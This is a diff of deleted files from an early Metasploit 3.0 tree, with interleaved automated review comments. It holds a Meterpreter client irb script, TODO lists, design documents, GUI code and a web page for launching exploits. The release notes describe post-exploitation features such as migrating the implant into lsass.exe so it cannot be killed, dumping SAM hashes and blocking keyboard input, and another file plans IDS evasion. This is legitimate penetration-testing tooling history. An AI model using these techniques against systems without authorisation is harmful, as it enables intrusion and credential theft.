sock = TCPSocket.new(ARGV[0], ARGV[1])
c = Rex::Post::Meterpreter::Client.new(sock)
c.core.use('Stdapi')
@c = c
irb
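Review bot: `irb` is invoked as a bare method but nothing in the file requires the `irb` library, and `@c = c` only publishes the client as an instance variable of the top-level object; the standard way to drop into a shell with `@c` in scope is `require 'irb'`, `ARGV.clear` (IRB parses `ARGV` itself, and the `<ip> <port>` arguments would otherwise be read as options), then `IRB.start`.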

View File

@ -1,6 +0,0 @@
- make it so packet dispatcher does not wait if timeout is 0
- priv
- add commands to search out efs files and download them

View File

@ -1,30 +0,0 @@
This file contains things that need to be done that aren't in the plan:
- revisit pivoting
- connections seemed slow
- data transfers seemed slow
Buggies:
- An exploit that has Compat = -find in the Payload section will still list
meterpreter's find_tag payload as compatible
- The target info should provide a packing function that matches the arch and
platform set in the target. Right now all exploits are calling big or little
packers on the target, regardless of the target arch.
- If the Authors is supplied as an array, with only a single author, and
that author isnt in the known list, a crash will occur.
./user_interfaces/../lib/rex/ui/text/dispatcher_shell.rb:184:in `run_command'
./user_interfaces/../lib/rex/transformer.rb:30:in `transform'
./user_interfaces/../lib/rex/transformer.rb:29:in `transform'
./user_interfaces/../lib/msf/core/module/author.rb:29:in `transform'
./user_interfaces/../lib/msf/core/module.rb:108:in `initialize'
./user_interfaces/../lib/msf/core/exploit.rb:170:in `initialize'
./user_interfaces/../lib/msf/core/exploit/tcp.rb:16:in `initialize'
./user_interfaces/../lib/msf/core/exploit/ftp.rb:19:in `initialize'
/home/projects/metasploit/rubyhacks/modules/exploits/windows/ftp/freeftpd_user.rb:62:in `initialize'
./user_interfaces/../lib/msf/core/module_manager.rb:47:in `create'
./user_interfaces/../lib/msf/core/module_manager.rb:251:in `create'
./user_interfaces/../lib/msf/ui/console/command_dispatcher/core.rb:871:in `cmd_use'

View File

@ -1,18 +0,0 @@
msf/core
- encoding is slow sometimes, profile it
meterpreter
- migration sometimes does partial reads of stages leading to crashes
- should switch to inlined staging in request packet
msfconsole
- jobs -k on the same exploit twice leads to exception
win32 bugs
- 'gets' blocks
- http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/151367
- works in cmd.exe
- does not work in rxvt (kbhit just keeps returning 0)
X - no HOME variable by default -- need to use another directory

View File

@ -1,53 +0,0 @@
Major subsystems
----------------
rex (lib/rex)
Contains generic classes that are used by various libraries
and by framework-core and other subsystems.
framework-core (lib/msf/core)
Provides the interface for interacting with modules, managing
sessions, and coordinating exploitation.
framework-base (lib/msf/base)
Implementations of the default sessions included in the
framework, such as Meterpreter, and other various elements
that are outside of the scope of framework-core. This
subsystem also provides a simple wrapper to framework-core
insofar as dealing with exploitation, encoding, payload,
and session interaction.
Dependencies
------------
+------------------+
| Rex |
+------------------+
^
|
|
|
+------------------+
| framework-core |
+------------------+
^
|
|
|
+------------------+
| framework-base |
+------------------+
^ ^
/ \
/ \
/ \
+-----------------+ +-----------------+
| user interface | | modules |
+-----------------+ +-----------------+
| msfconsole | | encoders |
| msfweb | | exploits |
| msfgtk | | payloads |
+-----------------+ +-----------------+

View File

@ -1,7 +0,0 @@
-= Logging
The following descriptions explain when each log level should be used.

View File

@ -1,22 +0,0 @@
- meterpreter
- many more advanced commands
- in-memory process migration
- disable/enable user input (keyboard/mouse)
- check remote idle time
- pivot through hosts
- interact with processes, threads, files, and the registry
- load DLLs into remote processes
- dump SAM database hashes
- irb mode
- msfconsole
- multiple concurrent sessions
- session backgrounding
- exploit backgrounding
- multiple concurrent exploits
- especially useful for passive exploits, like clientside bugs
- irb mode
- msfopcode
- new command line interface to opcode db
- msfd
- daemonized version of msfconsole
- all clients share the same framework instance

View File

@ -1,111 +0,0 @@
The Metasploit staff is proud to present the 3.0 alpha release of the Metasploit
Framework. This release marks a major milestone in the evolution of the
framework, and it's one that the staff hopes will push the framework into even
wider acceptance. The major differences between the 3.0 version of the
framework and prior versions center around one basic goal: automation. It has
become clear that the processes involved in performing a penetration test are
generally monotonous and could be easily streamlined, at least in part. For
that reason, many aspects of the framework have been designed with a focus on
making it easy for the builtin code to be easy to work with at a scripting
level. Furthermore, a keen interest has been put into making it possible to
augment and extend the framework's functionality beyond the scope to which it
has already been applied.
While this high-level description of the enhancements offerred by the 3.0
version may be fairly abstract, a number of particularly interesting
enhancements can be shown to give the impression of just what's in store.
== The Console Interface
The Metasploit console interface, msfconsole, has roughly the same look and feel,
but some of the more notable changes include:
- Backgrounded exploits
It's now possible to execute an exploit in the background. This means you
can have an exploit that triggers a passive vulnerability (such as a browser
bug) while aggressively doing other tasks.
- Multi-session exploits
Unlike the 2.x version of the framework, the 3.0 version is capable of
creating multiple sessions from a single exploit. This is especially useful
in the context of passive exploits that can have multiple clients
connecting.
- Multiple concurrent sessions
It is possible to have more than one active session established.
- IRB mode
Like Meterpreter, the console interface supports dropping into a ruby
scripting interface that makes it possible to directly interact with the
framework. This makes it possible to do low-level interaction with
sessions and framework modules.
== The Meterpreter
The meterpreter that is included in the 3.0 version of the framework is almost
nothing like what exists in the 2.0 version. The underlying architecture and
design remains the same, but the feature set and interface has been greatly
enhanced to not only make scripting the post-exploitation process possible but
to also increase the level of functionality. Instead of having separate modules
for each of the major subsystems (Fs, Process, Net, Sys), the 3.0 version of the
meterpreter has merged all of these common elements into one extension called
Stdapi, short for the Standard API. This API provides access to the file
system, registry, network, threads, processes, user interface, and much more.
Some of the cooler features of the new version of meterpreter include:
- In-memory process migration
This feature makes it possible to migrate the meterpreter server instance to
a completely different process, such as a system service like lsass.exe,
without having to establish a new connection. This means that if you
exploit an HTTP server and re-use the port 80 connection for the meterpreter
session, then it's possible to appear almost completely transparent due to
the elimination of the need to create a new connection. Furthermore,
migrating to a privileged process has the added benefit of making the server
impossible to kill without taking down the whole machine.
- Disabling user keyboard and mouse input
This feature makes it possible to prevent local keyboard and mouse input.
- SAM database hash retrieval
The SAM juicer extension that Vinnie Liu authored has been integrated into a
more generalized privilege escalation extension known as 'priv'. In the
future, this extension will provide local privilege escalation exploits.
- Advanced process manipulation
The 3.0 version of meterpreter has extensive support for interacting with
processes in terms of loading and unloading DLLs; reading, writing,
querying, allocating, and freeing memory; opening, creating, closing,
terminating, suspending, querying, and modifying threads; writing, and
reading standard input output, and so on.
- IRB mode
This feature is especially cool for all of the scripters out there. It
allows a user to drop into an interactive ruby shell that can be used to use
meterpreter at the scripting level rather than at the user-interface level.
This can be very useful because the scripting level features are far more
powerful and featureful than the user-interface.
- Network pivoting
Like other products, the 3.0 version of the framework supports seamless
pivoting through meterpreter. The 2.x branch of the framework had very
minimal support for this feature, but the 3.0 version is planned to have
much more robust support.
This release is meant to serve as a method of getting feedback and
correcting bugs prior to entering a true beta period. There are many features
that have not been completely implemented at this point and there are still some
edges that will need to be roughed out prior to the final release. Some of the
major features that have not been completed are:
- Native Windows support (due to interpreter issues)
- msfweb exploit and session interfaces
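Review bot: Typos in the text if this announcement is ever resurrected: "offerred" should be "offered" (second paragraph) and "builtin code to be easy to work with" repeats "easy"; "roughed out" in the closing paragraph reads as "smoothed out". Otherwise the document is consistent with the feature list in the preceding hunk.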

View File

@ -1,21 +0,0 @@
evasion
- new command: 'evasion'
- -l, list evasion subsystems
- set evasion subsystem level
- get evasion subsystem level
- set global evasion level
- get global evasion level
- modules cache evasion level at creation time
- modules pass evasion flags onto sockets via params
- sockets and protocols register subsystems
- sockets to take passed evasion level in precedence over subsystem/global
- consider http evasion
- random headers
- consider EvasionLevel advanced option on all exploits
misc
- session sharing through multiplexing
recon
- track exploit success, failure, host information
- support searching the knowledge base

View File

@ -1,35 +0,0 @@
<b>Scheduled alpha preview release:</b> December 15th, 2005<br/>
<br/>
Metasploit 3.0 is the next generation of the Metasploit Framework. It is written
in the <a href="http://www.ruby-lang.org/">Ruby</a> programming language.
As it stands, the 2.0 branch has made it possible to drastically reduce the
amount of time it takes to implement an exploit with the added benefit of making
it possible to re-use large amounts of code between various exploits. The
extensible model through which payloads, encoders, NOP generators, and exploits
can be integrated has made it possible to use the Metasploit Framework as an
outlet for cutting-edge exploitation research.<br/>
<br/>
In this light, the 3.0 version is being planned to help continue to evolve
the field of exploitation research and exploitation frameworks in general.
The primary goals of the 3.0 version are listed below:<br/>
<ul>
<li>To improve automation of exploitation through scripting
<li>To simplify the process of writing an exploit
<li>To increase code re-use between exploits
<li>To improve and generically integrate evasion techniques
<li>To support automated network discovery and event correlation through <i>recon</i> modules
<li>To continue to provide a friendly outlet to cutting edge exploitation technology
</ul>
As we get closer to the preview release date, we will begin posting design
documentation and other information that will allow the community to assess
the new architecture and provide feedback. The preview release will simply
be used as a milestone by which the public can help us to gauge how much
work remains until we feel comfortable that we have a finished product.<br/>
<br/>
In the meantime, here are some screenshots of the 3.0 release in development. Nothing
too fancy at this point, but it highlights some of the upcoming changes.<br/>
<br/>
<a href="http://www.hick.org/~mmiller/msf3/pics">Metasploit 3.0 Preview Screenshots</a>
<br/>
<br/>
- Metasploit Staff

View File

@ -1,130 +0,0 @@
The following things are required for the December alpha release:
- rex
X - post-exploitation
X - meterpreter
X - pivoting
X - portfwd command
- networking
X - switch board routing table for pivoting
X - meterpreter 'comm' support
- proxy 'comm' support
- asm
- block dependencies (req'd for shikata)
- block permutation generation (req'd for shikata)
X - text
X - create_pattern, pattern_offset
X - base64
X - consider extending String
X - logging
X - debug level limiter
X - define log levels, when they should be used, etc
- framework-core
X - modules
X - reloading
X - compatibility filtering (keys)
X - description sanitation (strip lines/etc)
X - payloads
X - meta information
X - stager/stage calling conventions
X - stack requirements
X - make payload prepend target specific
X - sessions
X - logging session activity
- module load caching
- switch to demand loaded modules rather than always loading
- should make things faster
X - recon
X - add a method like 'can_be_used' that checks whether or not dependencies are
X on the machine (like nmap) for a given module
- framework task queuing
- make the framework expose methods for queuing tasks (FrameworkTask)
- generic interface with an execute method
- called from within the context of a worker thread
- modules needing ports (above other modules)
- encoders
- shikata
X - nops
X - opty2
- payloads
- cmd payloads
X - mac os x payloads
- osx null free reverse stager
X - solaris payloads
X - bsd payloads
- user interfaces
- general
X - add concept of EVASION option (high, normal, low)
X - logging improvements
X - provide log file setting interface
X - log by default in the LogDir
X - msfcli
- msfweb
X - msfpayload
X - msfencode
- msfconsole
- spawn web-server from within msfconsole (msfweb instance)
- irb mode
- running 'msf scripts'
- testing framework
- framework core
X - handlers
- framework modules
- exploits
- payloads
X - encoders
- osx encoders
- nops
- recon
- framework sessions
- shell
- meterpreter
- documentation
- rex
- framework-core
- framework-base
- module interfaces
The following things should be implemented both as protocols and as exploit
mixins to encourage code re-use:
X - ftp
- backup agent protocols
- CA brightstor
X - Arkeia
X - mssql
- sunrpc
- xdr
- jbase
- oracle
Things that would be useful to have completed, but not a requirement:
- rex
- exploitation
- format string generator
- opcodedb client (return addr pooling)
- networking
- msfd 'comm' support
- modules
- payloads
- implement 'reliable' stagers with a higher rating so that
if there is enough room, reliable stagers can be used
- recon
X - basic range/port scanner
X - basic service identifier
- basic OS fingerprinting
- framework-core
- handler sharing
- exploits using the same payload/handler can share (ref count)
- plugin modules
- plugin modules can extend the framework and provide new features
X - framework-base
X - event correlation
X - recon events correlations
- user interfaces
- msfd
- daemon interface, provides command line interaction and proxying
- support authentication
- support SSL
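Review bot: the leading `X` that marks finished items (for example `X - meterpreter` and `X - msfcli`) is never explained in the file, and some sub-items such as `X - switch board routing table for pivoting` are marked done while their parent `- networking` is not, so a reader cannot tell whether a bare parent means "partially done" or "not started". A one-line legend at the top of the list (what `X` means and whether it propagates to parents) would remove the ambiguity.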

View File

@ -1,8 +0,0 @@
This file contains the list of exploits ported so far and their status:
Ported
======
aim_goaway: Needs more testing, but hit on Windows XPSP0
ie_objecttype: Slightly unstable, needs more testing, but functioning
msrpc_dcom_ms03_026: re-exploitation fails, but otherwise working

View File

@ -1,16 +0,0 @@
Things to *not* do in ruby that will break ruby threads. This list
isn't complete, but it's things I've noticed while working on stuff:
- select with no timeout
This will make a blocking select call that will block all other
threads.
Use Rex::ThreadSafe::select
- use sleep
This will block all threads.
Use Rex::ThreadSafe::sleep (we've now wrapped the global sleep to
call the rex sleep)
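Review bot: the second item contradicts itself: it says not to `use sleep` because it blocks all threads, then adds that the global `sleep` has now been wrapped to call `Rex::ThreadSafe::sleep`. If the wrapper is in place the prohibition no longer applies and the item should say so (or name the file where the wrapper lives); if the wrapper is only partial, say which callers still hit the raw `sleep`.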

View File

@ -1,14 +0,0 @@
DynamicSehRecord
- causes an exploit to generate a dynamic seh frame if it's an seh exploit
global
======
SessionLogging (true/yes/1)
- enables logging of sessions
ConsoleLogging (true/yes/1)
- enables logging of the console
DisableAutoSubscribe (true/yes/1)
- Disables the auto-subscription of modules to event provider interfaces.
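Review bot: the `DynamicSehRecord` entry at the top of the hunk sits above the `global` section heading and, unlike `SessionLogging`, `ConsoleLogging` and `DisableAutoSubscribe`, does not state which values it accepts. Give it the same `(true/yes/1)`-style value list as the other entries and put a heading over it so the file has one consistent section/entry format.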

View File

@ -1,48 +0,0 @@
Metasploit Framework MsfGUI TODO List
=====================================
1 - Modify the signal-connect on the MyExploitTree class
On Gtk::TreeView of this class, remove "one shot", just make it "execute", dont ask for RHOST
the exploit shouldnt get listed in the One-Shot piece until its completed and running and it
should be removed once the exploit finishes.
=> DONE
2 - Built the MSFLog with a Gtk::TextView
the MSFLog needs to also contain the outpout of the exploits as they run
So redirect the output User picks exploit, goes straight to wizard, they click Go
exploit is added to the Targets list while its in running state
(for background exploits like WMF, this will stay there until you manually kill it)
when a new session is created, those are added automatically to the sessions list
and the output of the exploits are sent to the MSFLogs window.
Add some colours with tags
=> DONE
3 - bind a signal-connect to a running exploit
you can right click running exploits and kill them (this is technically a job)
(right click from Targets)
=> DONE
4 - session interaction
needs a wider console, some little buttons for sending '^C' and stuff
(maybe even a toggle for hex-mode)
so when youre typing on a command shell and need to send like ^D to close out 'cat'
also, sessions needs a right-click meny for 'Close'
and some way to detect when a session is dead and remove it from the list
ie. you type "exit" on the shell
=> Partially done
5 - Preferences page
Ton of stuff like binding all Databases stuff or adding preselected payloads user
6 - Exploit research
I think there's a way to perform this feature :
- register all child iters from the parent modules (Standart, Payloads, Encoders, ...) to an array
- add a Gtk::Entry beside the TreeView or bind a Gtk::Dialog to a right click _Search
- Once, the research return true, jump to the selected iter and perform the usual view
=> DONE
7 - the msfconsole
A fun feature will be to plug the msfconsole to :
the Gtk::NoteBook page or/and a dedicated windows/dialog
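Review bot: items 5 (`Preferences page`) and 7 (`the msfconsole`) carry no status line, while every other item ends with `=> DONE` or `=> Partially done`, so it is not clear whether they are open or simply unmarked; add a status to each. Item 7 also ends on a dangling colon (`plug the msfconsole to :`) with no concrete target, which leaves the task undefined.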

View File

@ -1,86 +0,0 @@
#!/usr/bin/env ruby
#
# This is a basic irb interface using the Gtk2 GUI library
#
msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
$:.unshift(File.join(File.dirname(msfbase), 'lib'))
require 'gtk2'
require 'irb'
require 'rex'
class Console < Gtk::Window
require 'rex/io/bidirectional_pipe'
@@offset = 0
def initialize
super()
# Layout stuff
set_default_size(500, 400)
set_border_width(10)
# Skeleton ;-)
vbox = Gtk::VBox.new(false, 5)
add(vbox)
@buffer = Gtk::TextBuffer.new
@textview = Gtk::TextView.new(@buffer)
scrolled_window = Gtk::ScrolledWindow.new
scrolled_window.add(@textview)
vbox.pack_start(scrolled_window, true, true, 5)
scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)
signal_connect('destroy') do
Gtk.main_quit
end
signal_connect('key_press_event') do |edit, event|
if event.keyval == Gdk::Keyval::GDK_Return
catch_text
end
end
# Create the pipe interface
@pipe = Rex::IO::BidirectionalPipe.new
# Start the session interaction
@t_run = Thread.new do
IRB.init_config(nil)
IRB.conf[:USE_READLINE] = false
IRB.init_error
irb = IRB::Irb.new(IRB::WorkSpace.new())
IRB.conf[:MAIN_CONTEXT] = irb.context
irb.eval_input
end
# Create a subscriber with a callback for the UI
@sid = @pipe.create_subscriber_proc() do |data|
@buffer.insert(@buffer.end_iter, Rex::Text.to_utf8(data))
@buffer.move_mark('end_mark', @buffer.end_iter)
@textview.scroll_mark_onscreen(@buffer.get_mark('end_mark'))
end
show_all
end
def put_text(text = nil)
puts text if text
end
def catch_text
start = @buffer.get_iter_at_offset(@@offset)
puts @buffer.get_text(nil, @buffer.end_iter)
@buffer.insert(@buffer.end_iter,"\n")
if (not @buffer.get_mark('end_mark'))
@buffer.create_mark('end_mark', @buffer.end_iter, false)
end
@@offset = @buffer.end_iter.offset
end
end
Console.new
Gtk.main
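Review bot: the `Rex::IO::BidirectionalPipe` created at `@pipe = Rex::IO::BidirectionalPipe.new` is never handed to IRB, so `irb.eval_input` in the `@t_run` thread still reads the process's real stdin and writes to its stdout, and the subscriber registered with `create_subscriber_proc` never receives any data; IRB's input and output would have to be redirected to the pipe, and the text captured in `catch_text` written to the pipe rather than to `puts`, for the window to behave as a console. In `catch_text`, `start` is computed from `@@offset` but `@buffer.get_text(nil, @buffer.end_iter)` ignores it, so every Return re-sends the whole buffer instead of the text since the last prompt; use `get_text(start, @buffer.end_iter)`. `put_text` is unused, and `@@offset` is a class variable shared by every `Console` instance where an instance variable is intended.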

View File

@ -1,6 +0,0 @@
#!/usr/bin/env ruby
require 'gtk2'
puts "Gtk+ v#{Gtk::MAJOR_VERSION}.#{Gtk::MINOR_VERSION}.#{Gtk::MICRO_VERSION}"
puts "Ruby/GTK2 v#{Gtk::BINDING_VERSION.join(".")}"

View File

@ -1,122 +0,0 @@
Metasploit Framework Wx GUI Design Document
============================================
Code Layout
===========
The 'msfwx' executable must be a wrapper around a Msf::UI class. The
current code uses Msf::Ui::Wx::Driver as the backend.
The Driver must implement a constructor (initialize) that creates a
framework instance and intializes the UI code.
The Driver must implement a method called 'run' which actually starts
the GUI.
The actual GUI code should be stored in the lib/msf/ui/wx directory.
The Driver is responsible for loading any dependent UI code.
Wx uses the concept of an 'App' which has one or more 'Frames'.
The App should create the main Frame and configure the Menus.
The Frame should create all UI widgets, some of which can be
defined and loaded from other files.
The event processing code can be placed into frame.rb, or loaded from
another file, preferably separated out by functionality. The current
code does a rather poor job of separating GUI layout from the actual
processing code.
All constants should be placed into constants.rb in the lib/msf/ui/wx
directory.
These are basic guidelines - if something doesn't make sense, feel free
to change it.
GUI Features
============
The Wx GUI should support for the following basic features:
- List each module type and be able to filter based on search criteria
- Display information about any selected module, session, or job.
- Provide a tree view of all current hosts and all information about
each detected host. The user should be able to modify and add items
to the tree and apply modules to specific hosts and services in the
tree view.
- List each active session (a successful exploitation result) and give
the user the ability to interact with that session. I recommend using
the current Sessions tab and listing each session in a treeview. When
the user selects a session and double clicks, a new window will appear
that gives them the ability to interact with the session. When the
session interaction window is closed, the session should stay alive.
The user should be able to terminate the session by selecting it from
the list and hitting Delete or right clicking and using a pop-up menu.
In msfconsole, the session command is used to manage these.
- List each active 'job'. A job is an exploit or auxiliary module that
runs in the background. These modules can continue to produce data
and sessions while the user does other things. Examples of passive
exploits that create jobs are the browser exploits in:
modules/exploits/windows/browser/
In msfconsole, the job command is used to manage these.
- Provide a way to configure and execute a selected, non-exploit/auxiliary
module:
a) Provide the ability to generate shellcode from a Payload
b) Provide the ability to encode shellcode with an Encoder
c) Provide the ability to generate nop sleds with a Nop
- Provide a way to configure and execute an exploit or auxiliary module
a) Auxiliary modules will update the host information tree
b) Exploit 'check' functions will update the host information tree
c) Exploits can have their target system manualyl specified or selected
from the host information tree. Selecting a host node will fill in
the RHOST variable (if its supported) and selecting a service node
under a host will fill in the RPORT variable if its supported.
GUI Layout
==========
The GUI is divided into three distinct areas. On the left hand side we have
a set of tabs, each of which contains a list of things. This is where exploits,
sessions, jobs, payloads, and encoders live. The current msfwx code should
give you an idea of what I mean by this.
The bottom section can be used to display information about the currently
selected item (Information), the current debug log (output of print_status())
from inside modules, results of exploit execution, other standard 'console'
output, a mini-msfconsole that allows a subset of the normal commands to be used
and provides shortcuts for manipulating GUI elements (remove all sessions,
stop all jobs, run this exploit on all hosts, etc),
The right panel of the interface will contain the list of hosts in a tree view,
each host will also have a list of services, information entries, and other
data collected and reported by the other modules.
When a module is selected, a screen needs to be provided to configure the module
and start the execution. I have three ideas on this so far:
1) Make the right side consist of two tabs - one which has the host information
and another which is used to show module exploits and launch the actual module.
The thing that sucks about this is that if you want to see the host list while
you configure the module, you have to switch between the two tabs.
2) Make the module configuration a new dialog window that pops up. This is
the easier way and may end up being the cleanest way to implement this.
3) Move the list of hosts into the left-side tabs and then use the entire right
side to configure and launch the selected module.

View File

@ -1,311 +0,0 @@
<%= Msf::Ui::Web::Common.header(framework.version, 'exploits') %>
<tr><td colspan='5'>
<%
name = query_string['name']
step = query_string['step'] || 0
target = query_string['target']
step = step.to_i
if (name == nil)
%>
<%# Display the exploit list if one hasn't been selected %>
<br/>
<div align='center' class='navHead'>
<table class='moduleList' width='100%' cellspacing='0' border='0'>
<% framework.exploits.each_module { |name, mod|
modinst = mod.new
%>
<tr>
<td class='moduleIcons' align='center'>
<%= Msf::Ui::Web::Common.module_icons(modinst) %>
</td>
<td class='moduleName'>
<a href="exploits.rhtml?name=<%= name %>"><%= modinst.name %></a>
</td>
<td class='moduleSpacer' colspan='2'>
</td>
</tr>
<% } %>
</table>
</div>
<%# Wizard step 0 - target selection %>
<%
elsif (step == 0)
modinst = framework.exploits.create(name)
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
<tr>
<td align='right' width='80' class='textBold'>Name:</td>
<td class='textNormal'><%= html_escape(modinst.name) %></td>
</tr>
<tr>
<td align='right' width='80' class='textBold'>Authors:</td>
<td class='textNormal'><%= html_escape(modinst.author.join("<br/>")) %></td>
</tr>
<tr>
<td align='right' width='80' class='textBold' valign='top'>Description:</td>
<td colspan='2' class='textNormal' valign='top'>
<%= html_escape(modinst.description) %>
</td>
</tr>
<tr>
<td align='right' width='80' class='textBold' valign='top'>References:</td>
<td colspan='2' class='textNormal' valign='top'>
<% modinst.references.each { |ref| %>
<% if (ref.kind_of?(Msf::Module::SiteReference)) %>
- <a href='<%= ref.site %>' target='_blank'><%= ref.to_s %></a><br/>
<% else %>
- <%= ref.to_s %><br/>
<% end %>
<% } %>
</td>
</tr>
<tr>
<td align='right' width='80' class='textBold'>Targets:</td>
<td class='textNormal'>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td>
<table align='align' cellpadding='2' cellspacing='0' border='0'>
<tr>
<td class='textBold'>Target Name</td>
<td class='textBold'>Platform</td>
</tr>
<% modinst.targets.each_with_index { |tgt, idx| %>
<tr>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<%= idx %> - <a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= idx %>'><%= tgt.name %></a>
</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<%= Msf::Ui::Web::Common.target_icons(tgt) %>
</td>
</tr>
<% } %>
</table>
</td>
</tr>
</table>
<%# Wizard step 1 - payload selection %>
<%
elsif (step == 1)
modinst = framework.exploits.create(name)
modinst.datastore['TARGET'] = query_string['target'].to_i
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
<tr>
<td align='left' width='80' class='textBold'><nobr>Select Payload:</nobr></td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td class='textBold'>Name</td>
<td class='textBold'>Description</td>
</tr>
<% idx = 0
modinst.compatible_payloads.each { |pname, pmod|
pmodinst = pmod.new
%>
<tr>
<td>&nbsp;</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
<a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= target %>&payload=<%= pname %>'><%= html_escape(pname) %></a>
</td>
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'><%= html_escape(pmodinst.description) %></td>
</tr>
<% idx += 1
}
%>
</table>
<%# Wizard step 2 - option selection %>
<% elsif (step == 2)
payload = query_string['payload']
modinst = framework.exploits.create(name)
pinst = framework.payloads.create(payload)
modinst.datastore['TARGET'] = query_string['target'].to_i
%>
<br/>
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
<tr>
<td class='moduleName'>
<div class='textBold'><%= html_escape(modinst.name) %></div>
</td>
</tr>
</table>
<br/>
<form method='GET'>
<input type='hidden' name='eid' value="<%= Msf::Ui::Web::Driver::next_eid %>"/>
<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
<input type='hidden' name='step' value="<%= step + 1 %>"/>
<input type='hidden' name='target' value="<%= html_escape(modinst.datastore['TARGET']) %>"/>
<input type='hidden' name='payload' value="<%= html_escape(payload) %>"/>
<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
<%
options = pinst.options.merge_sort(modinst.options)
options.each { |name, option|
next if (option.advanced?)
next if (option.evasion?)
%>
<tr>
<td class='textBold'><%= name %></td>
<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
<td class='textNormal'><%= option.type %></td>
<td class='textNormal'>
<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
</td>
<td class='textNormal'><%= html_escape(option.desc) %></td>
</tr>
<% } %>
<tr><td colspan='5'>&nbsp;</td></tr>
<tr>
<td colspan='3' class='textBold'>
Preferred Encoder:<br/>
<select name='encoder' size='1'>
<option value='__default'>Default
<% pinst.compatible_encoders.each { |encname, mod| %>
<option><%= encname %>
<% } %>
</select>
</td>
<td colspan='2' class='textBold'>
NOP Generator:<br/>
<select name='nop' size='1'>
<option value='__default'>Default
<% pinst.compatible_nops.each { |nopname, mod| %>
<option><%= nopname %>
<% } %>
</select>
</td>
</tr>
<tr><td colspan='5'>&nbsp;</td></tr>
<noscript>
<input type='hidden' name='nojs' value="1"/>
</noscript>
<tr>
<td colspan='3' align='right'>
<input type='submit' name='action' value='Check' class='button'/>
</td>
<td colspan='2' align='left'>
<input type='submit' name='action' value='Exploit' class='button'/>
</td>
</tr>
</table>
</form>
<%# Wizard step 3 - exploitation %>
<%
elsif (step == 3)
# Is JS disabled in the client's browser?
nojs = query_string['nojs'] == '1' ? true : false
# Create the exploit instance
modinst = framework.exploits.create(name)
# Set the encoder/nop to nil if it's not valid.
query_string['encoder'] = nil if (query_string['encoder'] == '__default')
query_string['nop'] = nil if (query_string['nop'] == '__default')
# Build the options string
options = ''
query_string.each_pair { |k, v|
next if v.nil? or v.length == 0
if k =~ /^opt_(.*)$/
options += "#{$1}=#{v} "
end
}
# Use buffered output by default
output = Rex::Ui::Text::Output::Buffer.new
# If we support javascript, then we'll use something better
if nojs == false
# TODO
end
# Whether or not we should run this as a job
as_job = modinst.passive? || (nojs == false)
# Kick off the exploit process
error = false
begin
modinst.exploit_simple(
'Encoder' => query_string['encoder'],
'Nop' => query_string['nop'],
'Payload' => query_string['payload'],
'Target' => query_string['target'].to_i,
'OptionStr' => options,
'LocalOutput' => output,
'LocalInput' => nil,
'RunAsJob' => as_job)
rescue
display = "<span style='font-weight: bold'><span style='color: red'>Error:</span>&nbsp;&nbsp;" + html_escape($!) + "</span>"
error = true
end
# Use the buffered output for display if we didn't fail.
if error == false
display = html_escape(output.buf).gsub(/\n/, "<br>")
if as_job
display += "<br/><br/><span style='font-weight: bold'>Exploit is now running in the background.</span>"
end
end
%>
<br/>
<span style='font-weight: bold'>
Launching exploit <%= modinst.refname %> ...
</span>
<br/><br/>
<%= display %>
<% else %>
Unknown step: <%= html_escape(step) %>
<% end %>
</td></tr>
<%= Msf::Ui::Web::Common.footer %>
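Review bot: several `query_string` values are interpolated into HTML attributes and URLs without escaping. In the module list `name` comes from `framework.exploits.each_module`, but in the later steps `name`, `target` and `payload` come straight from the request, and lines such as `&target=<%= target %>&payload=<%= pname %>` and `value="<%= html_escape(modinst.datastore['TARGET']) %>"` are inconsistent about it; run every request-derived value through `html_escape` (and URL-encode query parameters) the way the `Name:` and `Description:` cells already do. At `html_escape(modinst.author.join("<br/>"))` the separator is escaped together with the names, so the page shows literal `<br/>` text; escape each author and then join. In step 3, `options += "#{$1}=#{v} "` builds a space-separated `OptionStr` from raw query values, so a value containing whitespace would be parsed as an additional option assignment; reject or quote such values before concatenation. Finally, the launch form is `<form method='GET'>` with a submit named `action` valued `Exploit`, so a state-changing action is reachable by a plain GET and is exposed to cross-site request forgery; use POST with an anti-forgery token.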

Binary image files not shown (sizes 77 B to 65 KiB).

Some files were not shown because too many files have changed in this diff.